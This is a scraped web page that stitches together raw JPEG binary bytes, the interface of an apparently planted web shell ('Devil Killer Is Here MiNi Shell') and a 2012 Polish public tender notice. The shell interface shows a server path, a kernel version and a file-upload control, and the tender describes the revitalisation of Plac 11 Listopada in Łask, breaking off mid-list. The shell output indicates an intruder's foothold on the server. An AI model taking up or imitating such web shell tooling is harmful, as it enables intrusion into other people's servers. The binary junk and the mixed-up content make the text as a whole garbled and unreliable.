JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20120330/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20120330/100566-N-2012.html

<p class="kh_header"><b>Łask: Rewitalizacja Placu 11 Listopada w Łasku</b><br>
<b>Numer ogłoszenia: 100566 - 2012; data zamieszczenia: 30.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Łask , ul. Warszawska 14, 98-100 Łask, woj. łódzkie, tel. 043 6768300, faks 043 6768388.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lask.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rewitalizacja Placu 11 Listopada w Łasku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem niniejszego zamówienia jest rewitalizacja Placu 11 Listopada w Łasku oraz odcinków ulic przylegających do rynku. Zakres inwestycji obejmuje budowę kanalizacji deszczowej, przebudowę kanalizacji sanitarnej, budowę odcinka sieci wodociągowej, częściową przebudowę układu komunikacyjnego i parkingów ze zmianą lokalizacji wiaty przystankowej, wymianę nawierzchni w centralnej części placu i chodników wzdłuż zabudowy, przebudowa oświetlenia w obrębie placu i budowa oświetlenia dekoracyjnego, budowa fontanny wraz z zapleczem technologicznym, nasadzenia nowej roślinności, wymiana wyposażenia ruchomego: ławki, kosze, stojaki na rowery, słupki ograniczające.
2.	W zakres prac związanych z rewitalizacją Placu 11 Listopada w Łasku wchodzą:
2.1.	Roboty związane z budową kanalizacji deszczowej, budową i przebudową kanalizacji sanitarnej i budową odcinka sieci wodociągowej:
2.1.1.	przewiduje się budowę kanalizacji deszczowej z rur PVC o łącznej długości 425 m, w tym: O 500 - 38,50 m; O 315 - 341,50 m; O 250 - 45,00 m; przykanaliki do wpustów ulicznych O 200 - 156,0 m; 27 szt. wpustów ulicznych, 14 szt. studni O 1200 mm żelbetowych; z realizacji został wyłączony odcinek kanalizacji od SD1 do SD2 wraz ze studniami i wpusty uliczne w1, w2, w3 i w4 przy skrzyżowaniu z ulicami M. Konopnickiej i Żeromskiego;
2.1.2.	przebudowa kanalizacji sanitarnej z rur PP o łącznej długości 307,10 m, w tym: O 600 - 185,30 m; O 500 - 121,80 m; przykanaliki O 160 - 31 szt. o długości 253,80 m, 7 szt. studni O 1200 mm żelbetowych;
2.1.3.	sieć wodociągowa z rur PE O 63 mm o długości 87,0 m z przyłączami o długości 43,50 m (8 szt.).
2.2.	Instalacje wodno-kanalizacyjne (przyłącza do centralnej części placu):
2.2.1.	Przyłącze wodociągowe.
Przyłącze wodociągowe do fontanny o długości 20,0 m z rur PEHD SDR11, Dn=32 mm. Włączenie do wodociągu Dn=110, należy wykonać za pomocą nawiertki oraz zamontowanie zasuwy klinowej z miękkim uszczelnieniem.
2.2.2.	Przyłącze kanalizacji.
Przyłącze kanalizacyjne do fontanny o długości 23,9 m należy wykonać z rur PVC Dn 160 mm od projektowanej studni SD16-SR1 zlokalizowanej na Placu 11 Listopada do projektowanej studzienki rewizyjnej SR2 o średnicy Dn 1200 mm. Do kanalizacji odprowadzane będą wody nadmiarowe oraz zrzutowe z fontanny. Dla realizacji fontanny należy wykonać układ przewodów ciśnieniowych PEHD 110 jako układ odprowadzenia wody z fontanny do ponownego wykorzystania. Na przewodach należy zamontować 3 studnie rewizyjne Dn 425 z tworzywa. Układ przewodów zapewni również odprowadzenie do zrzutu wody na okres zimy. W celu odprowadzenia wody zrzutowej z komory należy w bagienku zamontować pompę zatapialną z pływakiem do przetłaczania wody brudnej z komory rurociągiem z rur PE Dn 63 mm o długości 8,9 m do studni SR2.
2.2.3.	Roboty ziemne dla wodociągu i kanalizacji sanitarnej.
Roboty ziemne prowadzić metodą mechaniczną a w miejscach krzyżowania się z uzbrojeniem podziemnym prace prowadzić ręcznie z zachowaniem szczególnej ostrożności. Wykopy należy zabezpieczyć przez szalowanie.
2.3.	Roboty drogowe (drogi, chodniki, parkingi):
Komunikacja jak i układ parkingów ulega reorganizacji. Większość miejsc parkingowych jest zachowana, uległy tylko częściowej zmianie ich lokalizacje, a co za tym idzie - większa liczba miejsc (83), w tym 2 miejsca dla niepełnosprawnych. Został zachowany duży parking od strony północno-wschodniej. Projektuje się również przebudowę okalających plac jezdni tak aby uzyskać dodatkowe miejsca parkingowe oraz 2 zatoki autobusowe. Przebudowa okalających ulic polega na niewielkiej korekcie przebiegu krawężników oraz na całkowitej wymianie nawierzchni wraz z podbudową. Wraz z wymianą nawierzchni ulegają korekcie istniejące niwelety tak, aby odprowadzić wody opadowe do zaprojektowanych już wpustów ulicznych.
UWAGA: Materiały pochodzące z rozbiórki nawierzchni chodników (kostka, obrzeża, krawężniki), nawierzchni i podbudowy ulic Wykonawca przekaże Zamawiającemu we wskazane przez niego miejsce położone w odległości do 5 km od placu budowy. Materiały pochodzące z rozbiórki nawierzchni chodników (kostka, obrzeża, krawężniki) należy ułożyć na paletach z wyjątkiem uszkodzonych elementów.
2.3.1.	Roboty rozbiórkowe:
2.3.1.1.	rozebranie krawężników betonowych - 1070 m,
2.3.1.2.	rozebranie mechaniczne (poprzez sfrezowanie) nawierzchni z mas mineralno-bitumicznych gr. 8 cm - 5567 m2,
2.3.1.3.	rozebranie mechaniczne nawierzchni z betonu gr. 15 cm - 5567 m2.
2.3.2.	Projektowane nawierzchnie:
2.3.2.1.	ulice z asfaltobetonu dwuwarstwowego na podbudowie z chudego betonu kategoria ruchu KR-3 - 3655 m2,
2.3.2.2.	parkingi przyuliczne kostka betonowa wibroprasowana na podbudowie z chudego betonu - 1253 m2,
2.3.2.3.	chodniki z kostki betonowej wibroprasowanej na podbudowie z kruszywa łamanego - 2103,2 m2,
2.3.2.4.	parking na Placu 11 Listopada kostka bazaltowa na podbudowie z chudego betonu - 781,7 m2,
2.3.2.5.	obramowanie wszystkich wpustów deszczowych z kostki granitowej na szer. 50 cm wokół wpustu,
2.3.2.6.	krawężniki kamienne 20x25 cm - 1140,60 m.
2.4.	Instalacje elektryczne, oświetlenie placu:
UWAGA: Zdemontowane słupy oświetleniowe, oprawy oświetleniowe i podstawy słupów oświetleniowych Wykonawca przekaże Zamawiającemu we wskazane przez niego miejsce położone w odległości do 5 km od placu budowy.
2.4.1.	Rozbiórki i demontaże:
2.4.1.1.	demontaż opraw oświetlenia zewnętrznego przy pomniku - 8 szt.,
2.4.1.2.	demontaż słupów oświetleniowych - 23 szt.,
2.4.1.3.	demontaż opraw oświetleniowych - 23 szt.
2.4.2.	Dostarczenie i montaż:
2.4.2.1.	słupów oświetleniowych i przewodów do opraw - 31 szt.,
2.4.2.2.	opraw oświetleniowych na słupie - 31 szt.,
2.4.2.3.	latarń oświetleniowych parkowych - 20 szt.,
2.4.2.4.	projektorów oświetleniowych, oprawy doziemne - 585 szt.,
2.4.2.5.	opraw oświetlenia zewnętrznego przy pomniku - 8 szt.,
2.4.2.6.	wiercenie otworów w podłożu kamiennym - 585 szt.,
2.4.2.7.	złącza kablowego typu ZK3 - 1 kpl.,
2.4.2.8.	ułożenie rur osłonowych z PCW - 250 m,
2.4.2.9.	ułożenie kabli w rowach ręcznie - 2750 m.
2.5.	Roboty ogólnobudowlane (centralna część placu):
2.5.1.	Przewiduje się całkowitą wymianę nawierzchni placu wraz ze zmianą układu komunikacji pieszej. Wykonanie nawierzchni planuje się z elementów kamiennych (płyt) zróżnicowanych kolorystycznie i materiałowo. Konstrukcja utwardzenia placu to warstwa odsączająca z piasku gr. 15 cm, podbudowa z tłucznia kamiennego 0 do 31,5 gr. 15 cm, podsypka cementowo-piaskowa 5 cm, płyty kamienne 6 cm. Obrzeża kamienne gładzone. Podbudowa pod nawierzchnie placu przewidziana została dla kategorii ruchu KR-1. Projektuje się przebudowę okalających plac jezdni tak aby uzyskać dodatkowe miejsca parkingowe oraz 2 zatoki autobusowe. Przebudowa okalających ulic polega na niewielkiej korekcie przebiegu krawężników oraz na całkowitej wymianie nawierzchni wraz z podbudową. Wraz z wymianą nawierzchni ulegają korekcie istniejące niwelety tak, aby odprowadzić wody opadowe do zaprojektowanych już wpustów ulicznych.
2.5.2.	Roboty rozbiórkowe:
2.5.2.1.	rozebranie obrzeży trawnikowych 8x30 cm - 783 m,
2.5.2.2.	rozebranie ręczne nawierzchni z kostki betonowej na podsypce cementowo-piaskowej - 3330 m2,
2.5.2.3.	 rozebranie mechaniczne nawierzchni z kostki kamiennej regularnej - 51 m2,
2.5.2.4.	rozebranie chodników z płyt granitowych na podsypce cementowo piaskowej - 86 m2,
2.5.2.5.	załadowanie i wywiezienie gruzu na odległość do 10 km - 2671 m3.
2.5.3.	Projektowane nawierzchnie:
2.5.3.1.	chodniki z płyt kamiennych na podbudowie z kruszywa łamanego - 4069,7 m2,
2.5.3.2.	obramowanie placu kostka granitowa na podbudowie betonowej,
2.5.3.3.	obramowanie wszystkich wpustów deszczowych z kostki granitowej na szer. 50 cm wokół wpustu,
2.5.3.4.	obrzeża granitowe 30x8 cm - 1142 m.
2.6.	Mała architektura, fontanna:
2.6.1.	Rozbiórki:
2.6.1.1.	rozbiórka istniejących ławek - 12 szt.,
2.6.1.2.	rozbiórka istniejących koszy na śmieci - 8 szt.,
2.6.1.3.	rozbiórka istniejącego słupa ogłoszeniowego betonowego - 1 szt.,
2.6.1.4.	rozbiórka istniejących tablic reklamowych - 3 szt.,
2.6.1.5.	demontaż studni - 1 szt.,
2.6.1.6.	demontaż zdroju - 1 szt.
2.6.2.	Dostarczenie i montaż:
2.6.2.1.	ławek stalowo-drewnianych 180x71 cm - 15 szt.,
2.6.2.2.	ławek stalowo-drewnianych 180x50 cm - 5 szt.,
2.6.2.3.	stojaków na rowery 90x80 cm - 12 szt.,
2.6.2.4.	słupków stalowych wys. 100 cm - 104 szt.,
2.6.2.5.	koszy na śmieci 82x38 cm - 28 szt.,
2.6.2.6.	koszy na psie odchody - 1 szt.
2.6.3.	Fontanna:
2.6.3.1.	Zaprojektowano trzy niecki prostopadłościenne, żelbetowe, monolityczne o wymiarach wewnętrznych 5,76x1,86 m; 7,56x1,86 m; 6,66x1,86 m i głębokości w świetle 0,4 m. Niecki będą zagłębione w gruncie - 0,75 m poniżej projektowanego poziomu terenu. Grubość ścian 20 cm. Grubość dna od 25 do 27 cm. Spadki uformowane w betonie płyty dennej - 0,7%. Konstrukcja będzie przykryta płytami kamiennymi opartymi na kątownikach zakotwionych w ścianach niecek oraz na systemowej konstrukcji wsporczej opartej na dnie zbiornika. Na styku płyty dennej i ściany w przerwie roboczej należy zastosować taśmy uszczelniające. Przejścia przez płytę denną rurociągów należy wykonać jako szczelne.
2.6.3.2.	Komora technologiczna żelbetowa: zaprojektowano zbiornik prostopadłościenny, żelbetowy, monolityczny o wymiarach wewnętrznych 4,0x4,0 m i głębokości w świetle 2,2 m. Zbiornik będzie całkowicie zagłębiony w gruncie - 3,305 m poniżej projektowanego poziomu terenu. Grubość ścian 25 cm. Grubość dna od 30 do 31,5 cm, a płyty przykrywającej 20 cm. Studzienka przykryta kratą Wema. Dostęp do komory będzie zapewniony przez kominek żelbetowy o wymiarach wewnętrznych 0,9x0,9 m przykryty włazem żeliwnym. Kominek zostanie wzniesiony 9,5 cm ponad teren. Zejście do zbiornika zapewnione po stopniach żeliwnych. Przejścia przez ściany rurociągów należy wykonać jako szczelne.
2.6.3.3.	Zasilanie fontanny i złącza imprez plenerowych: dla zasilania imprez plenerowych i projektowanej fontanny należy z rozdzielni RSOU wyprowadzić kabel typu YAKY 4x35 mm2 i wprowadzić do projektowanego złącza. Złącze projektuje się izolowane z tworzywa termoutwardzalnego posiadające atest, w miejscu pokazanym na mapie. Projektowane złącze sprefabrykować zgodnie z rysunkiem nr E3. Ze złącza należy wyprowadzić kabel typu YAKY 5x10mm2 i wprowadzić do rozdzielni fontanny zlokalizowanej w komorze. Z rozdzielni fontanny wyprowadzić obwody do zasilania:
-	oświetlenia komory fontanny,
-	grzejnika elektrycznego komory fontanny,
-	szafy sterowniczej fontanny.
2.7.	Zagospodarowanie zieleni:
2.7.1.	Wymiana podłoża na żyzną ziemię kompostową, w miejscach gdzie będą posadzone rośliny:
2.7.1.1.	do głębokości 0,70 m w miejscach sadzenia drzew,
2.7.1.2.	do głębokości 0,40 m w miejscach sadzenia krzewów żywopłotowych i roślin okrywowych.
2.7.2.	Posadzenie materiału roślinnego:
2.7.2.1.	Klon zwyczajny Globosum Acer platanoides Globosum - drzewa o regularnej, kulistej koronie do 6 m szerokości, forma szczepiona na pniu, liście jesienią przebarwiające się na żółto, gatunek ten ma małe wymagania glebowe i jest odporny na warunki miejskie.
2.7.2.2.	Bukszpan wieczniezielony Buxus sempervirens - gęsty, zimozielony krzew, o małych skórzastych, ciemnozielonych liściach, odporny na zanieczyszczenia miejskie, w surowe zimy może przemarzać w różnym stopniu, doskonale znosi strzyżenie, jest wykorzystywany na formowane żywopłoty.
2.7.2.3.	Trzmielina Fortunea Euonymus fortunei Emerald Gaiety - zimozielony, płożący krzew, ze ścielącymi się pędami, osiąga wysokość 25 cm, doskonała roślina okrywowa.
2.7.2.4.	Barwinek pospolity Gertrude Jekyll Vinca minor Gertrude Jekyll - płożąca, zimozielona krzewinka, liście drobne, ciemnozielone, błyszczące, tworzą zwarty kobierzec, bardzo liczne białe kwiaty.
2.7.3.	Zestawienie zieleni istniejącej:
2.7.3.1.	Drzewa istniejące pozostawione:
2.7.3.1.1.	Lipa drobnolistna Tilia cordata 4 szt. (drzewa rosnące na rynku),
2.7.3.1.2.	Lipa drobnolistna Tilia cordata 31 szt. (drzewa rosnące wzdłuż pierzei),
2.7.3.1.3.	Głóg dwuszyjkowy Crataegus media 2 szt.,
2.7.3.1.4.	Śliwa wiśniowa Prunus cerasifera 1 szt.,
2.7.3.1.5.	Karagana syberyjska Caragana arborescens 1 szt.,
2.7.3.1.6.	Klon zwyczajny Globosum Acer platanoides Globosum 22 szt.
2.7.3.2.	Drzewa i krzewy do usunięcia:
2.7.3.2.1.	Krzewy iglaste 120 m2,
2.7.3.2.2.	Żywotnik zachodni Thuja occidentalis 11 szt.,
2.7.3.2.3.	Berberys Berberis sp. 1 szt.,
2.7.3.2.4.	Kosodrzewina Pinus mugo 1 szt.,
2.7.3.2.5.	Klon zwyczajny Globosum Acer platanoides Globosum 1 szt.,
2.7.3.2.6.	Cis pospolity Taxus baccata 1 szt.,
2.7.3.2.7.	Karagana syberyjska Caragana arborescens 3 m2,
2.7.3.2.8.	Sosna Pinus sp. 1 szt.,
2.7.3.2.9.	Jarząb pospolity Sorbus aucuparia 1 szt.
2.7.3.3.	Drzewa i krzewy do przesadzenia:
2.7.3.3.1.	Magnolia Magnolia sp. 4 szt.,
2.7.3.3.2.	Brzoza brodawkowata Youngii Betula pendula Youngii 3 szt.,
2.7.3.3.3.	Jabłoń Malus sp. 1 szt.,
2.7.3.3.4.	Jarząb szwedzki Sorbus intermedia 1 szt.,
2.7.3.3.5.	Świerk pospolity Picea abies 1 szt.,
2.7.3.3.6.	Cis pospolity Taxus baccata 3 szt.,
2.7.3.3.7.	Karagana syberyjska Pendula Caragana arborescens Pendula 1 szt.,
2.7.3.3.8.	Jarząb pospolity Pendula Sorbus aucuparia Pendula 1 szt.,
2.7.3.3.9.	Klon zwyczajny Acer platanoides (odmiana czerwonolistna) 1 szt.
2.8.	Budowa wiaty przystankowej - dostarczenie i montaż wiaty przystankowej 480x200x250 cm - 1 szt.
3.	Niniejsze zamówienie stanowi część projektu pn. Rewitalizacja Placu 11 Listopada w Łasku współfinansowanego przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Łódzkiego na lata 2007- 2013. Oś Priorytetowa VI Odnowa obszarów miejskich Działanie VI.1 Rewitalizacja obszarów problemowych.
4.	Szczegółowy opis przedmiotu zamówienia zawiera dokumentacja projektowa oraz specyfikacja techniczna wykonania i odbioru robót budowlanych stanowiąca załączniki nr 8 i 9 do SIWZ.
5.	Przedmiary robót załączone do niniejszej SIWZ należy traktować jako element dodatkowy, a nie służący do obliczenia ceny oferty (załącznik nr 10 do SIWZ).</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających polegających na powtórzeniu tego samego rodzaju robót budowlanych, które objęte zostały przedmiotem zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.11.27.00-2, 45.11.00.00-1, 45.23.33.00-2, 45.23.32.50-6, 45.23.32.93-9, 45.23.13.00-8, 45.11.27.10-5, 45.31.10.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Zasady wnoszenia wadium
1.1.	Wykonawca przystępujący do przetargu jest obowiązany, przed upływem terminu składania ofert, wnieść wadium w wysokości 200 000,00 PLN.
1.2.	Wadium może być wniesione w jednej formie lub kilku z form określonych w art. 45 ust. 6 ustawy.
1.3.	Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego nr: 84 1240 3288 1111 0000 2807 7394. Za skuteczne wniesienie wadium w pieniądzu Zamawiający uważa wadium, które w terminie składania ofert znajdzie się (zostanie zaksięgowane) na koncie Zamawiającego.
1.4.	Wadium wnoszone w innej formie niż pieniądz, należy złożyć przed upływem terminu składania ofert w formie oryginału wraz z ofertą w jednym opakowaniu (oryginału prosimy nie złączać trwale z formularzem ofertowym).
1.5.	Zamawiający zwraca, zatrzymuje oraz żąda ponownego wniesienia wadium na zasadach określonych w art. 46 ustawy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie niniejszego zamówienia mogą ubiegać się Wykonawcy niepodlegający wykluczeniu z postępowania o udzielenie zamówienia publicznego spełniający ponadto warunki dotyczące posiadania wiedzy i doświadczenia, tj.: Wykonawcy, którzy udokumentują wykonanie, tj. zakończenie w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej:
1.	2 robót budowlanych obejmujących swoim zakresem budowę/przebudowę/remont kanalizacji deszczowej/kanalizacji sanitarnej/sieci wodociągowej o wartości co najmniej 500 000,00 zł brutto każda ;
2.	2 robót budowlanych obejmujących swoim zakresem budowę/przebudowę dróg o nawierzchni bitumicznej o powierzchni co najmniej 1 500,00 m2 każda;
3.	2 robót budowlanych obejmujących swoim zakresem budowę/przebudowę nawierzchni z płyt kamiennych o wartości co najmniej 2 000,00 m2 każda;
4.	1 roboty budowlanej obejmującej swoim zakresem budowę oświetlenia składającego się z projektorów oświetleniowych montowanych w oprawach doziemnych o wartości co najmniej 500 000,00 zł brutto.
Jeżeli załączony wykaz wykonanych robót budowlanych będzie potwierdzać wartość tych robót w walucie innej niż PLN, Wykonawca powinien dokonać przeliczenia na PLN wg średniego kursu NBP z dnia, w którym opublikowane zostało ogłoszenie o przedmiotowym zamówieniu. W przypadku, gdy w przedstawionym wykazie wskazane zostaną przez Wykonawcę wartości w walucie innej, niż PLN, Zamawiający dokona przeliczenia na PLN wg kursu średniego NBP na dzień, w którym opublikowane zostało ogłoszenie o przedmiotowym zamówieniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie niniejszego zamówienia mogą ubiegać się Wykonawcy niepodlegający wykluczeniu z postępowania o udzielenie zamówienia publicznego spełniający ponadto warunki dotyczące dysponowania osobami zdolnymi do wykonania zamówienia, tj. Wykonawcy, którzy dysponują lub będą dysponować:
1.	co najmniej 1 osobą posiadającą uprawnienia budowlane  do kierowania robotami budowlanymi w specjalności drogowej - pełniącą funkcję kierownika budowy na etapie realizacji przedmiotowego zamówienia;
2.	co najmniej 1 osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych, - pełniącą funkcję kierownika robót sanitarnych na etapie realizacji przedmiotowego zamówienia;
3.	co najmniej 1 osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych - pełniącą funkcję kierownika robót elektrycznych na etapie realizacji przedmiotowego zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

